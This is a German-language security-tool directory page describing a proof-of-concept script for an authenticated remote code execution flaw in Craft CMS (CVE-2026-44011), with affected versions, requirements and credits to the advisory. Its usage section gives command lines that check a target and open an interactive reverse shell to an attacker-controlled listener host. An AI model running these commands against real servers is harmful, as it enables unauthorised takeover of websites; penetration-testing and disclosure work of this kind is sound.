Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-44011-poc — Authentifizierte Craft CMS RCE PoC für CVE-2026-44011 | Kitploit
Tools/GitHubGitHub/dennisdgr/cve-2026-44011-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubdennisdgr/cve-2026-44011-poc

CVE-2026-44011-poc

Authentifizierte Craft CMS RCE PoC für CVE-2026-44011

Repository anzeigen
4vor 3 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-44011: Craft CMS authentifizierte RCE PoC

Dieses Python-Skript adaptiert den Angriff, der im Craft CMS Security Advisory beschrieben wird. Ein authentifizierter Craft-Benutzer kann einen anfälligen Konfigurationspfad für das Feld-Layout erreichen und den Server zur Ausführung von Befehlen veranlassen.

Umfang und Anforderungen

Betroffene Versionen sind Craft CMS >=4.0.0, <4.17.12 und >=5.0.0, <5.9.18.

Das Skript erfordert curl auf beiden Hosts. Es verwendet Bash auf dem Server. Python3 auf dem Server stellt ebenfalls ein interaktives PTY bereit; ohne dieses fällt die Shell auf eine einfache Verbindung zurück.

Verwendung

# Confirm the host is vulnerable
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password' --check

# Open an interactive shell
python3 cve-2026-44011.py --url https://target.example --lhost 192.0.2.10 --lport 8000 --username editor --password 'password'

Danksagung

Craft CMS nennt @precicom-vincent-tl als Finder von CVE-2026-44011. Die Schwachstellendetails und das Beispiel-Payload sind im Craft CMS Advisory GHSA-qrgm-p9w5-rrfw veröffentlicht. Dieses Skript adaptiert die dort veröffentlichte Technik.

Tool herunterladen